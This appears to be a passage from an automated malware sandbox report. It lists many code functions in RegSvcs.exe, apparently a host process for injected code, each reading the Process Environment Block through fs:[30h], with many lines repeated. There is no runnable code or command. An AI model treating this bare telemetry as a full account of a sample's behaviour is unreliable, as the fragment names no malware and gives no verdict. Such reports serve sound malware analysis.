                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01638350 mov ecx, dword ptr fs:[00000030h]15_2_01638350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165A352 mov eax, dword ptr fs:[00000030h]15_2_0165A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov ecx, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C310 mov ecx, dword ptr fs:[00000030h]15_2_0158C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B0310 mov ecx, dword ptr fs:[00000030h]15_2_015B0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016163C0 mov eax, dword ptr fs:[00000030h]15_2_016163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C63FF mov eax, dword ptr fs:[00000030h]15_2_015C63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164C3CD mov eax, dword ptr fs:[00000030h]15_2_0164C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016343D4 mov eax, dword ptr fs:[00000030h]15_2_016343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016343D4 mov eax, dword ptr fs:[00000030h]15_2_016343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov ecx, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B438F mov eax, dword ptr fs:[00000030h]15_2_015B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B438F mov eax, dword ptr fs:[00000030h]15_2_015B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596259 mov eax, dword ptr fs:[00000030h]15_2_01596259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A250 mov eax, dword ptr fs:[00000030h]15_2_0158A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618243 mov eax, dword ptr fs:[00000030h]15_2_01618243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618243 mov ecx, dword ptr fs:[00000030h]15_2_01618243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158826B mov eax, dword ptr fs:[00000030h]15_2_0158826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158823B mov eax, dword ptr fs:[00000030h]15_2_0158823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov ecx, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE284 mov eax, dword ptr fs:[00000030h]15_2_015CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE284 mov eax, dword ptr fs:[00000030h]15_2_015CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02A0 mov eax, dword ptr fs:[00000030h]15_2_015A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02A0 mov eax, dword ptr fs:[00000030h]15_2_015A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598550 mov eax, dword ptr fs:[00000030h]15_2_01598550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598550 mov eax, dword ptr fs:[00000030h]15_2_01598550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626500 mov eax, dword ptr fs:[00000030h]15_2_01626500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015965D0 mov eax, dword ptr fs:[00000030h]15_2_015965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA5D0 mov eax, dword ptr fs:[00000030h]15_2_015CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA5D0 mov eax, dword ptr fs:[00000030h]15_2_015CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE5CF mov eax, dword ptr fs:[00000030h]15_2_015CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE5CF mov eax, dword ptr fs:[00000030h]15_2_015CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC5ED mov eax, dword ptr fs:[00000030h]15_2_015CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC5ED mov eax, dword ptr fs:[00000030h]15_2_015CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015925E0 mov eax, dword ptr fs:[00000030h]15_2_015925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE59C mov eax, dword ptr fs:[00000030h]15_2_015CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016105A7 mov eax, dword ptr fs:[00000030h]15_2_016105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016105A7 mov eax, dword ptr fs:[00000030h]15_2_016105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016105A7 mov eax, dword ptr fs:[00000030h]15_2_016105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4588 mov eax, dword ptr fs:[00000030h]15_2_015C4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01592582 mov eax, dword ptr fs:[00000030h]15_2_01592582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01592582 mov ecx, dword ptr fs:[00000030h]15_2_01592582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B45B1 mov eax, dword ptr fs:[00000030h]15_2_015B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B45B1 mov eax, dword ptr fs:[00000030h]15_2_015B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B245A mov eax, dword ptr fs:[00000030h]15_2_015B245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161C460 mov ecx, dword ptr fs:[00000030h]15_2_0161C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158645D mov eax, dword ptr fs:[00000030h]15_2_0158645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE443 mov eax, dword ptr fs:[00000030h]15_2_015CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BA470 mov eax, dword ptr fs:[00000030h]15_2_015BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BA470 mov eax, dword ptr fs:[00000030h]15_2_015BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BA470 mov eax, dword ptr fs:[00000030h]15_2_015BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616420 mov eax, dword ptr fs:[00000030h]15_2_01616420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8402 mov eax, dword ptr fs:[00000030h]15_2_015C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8402 mov eax, dword ptr fs:[00000030h]15_2_015C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8402 mov eax, dword ptr fs:[00000030h]15_2_015C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA430 mov eax, dword ptr fs:[00000030h]15_2_015CA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E420 mov eax, dword ptr fs:[00000030h]15_2_0158E420
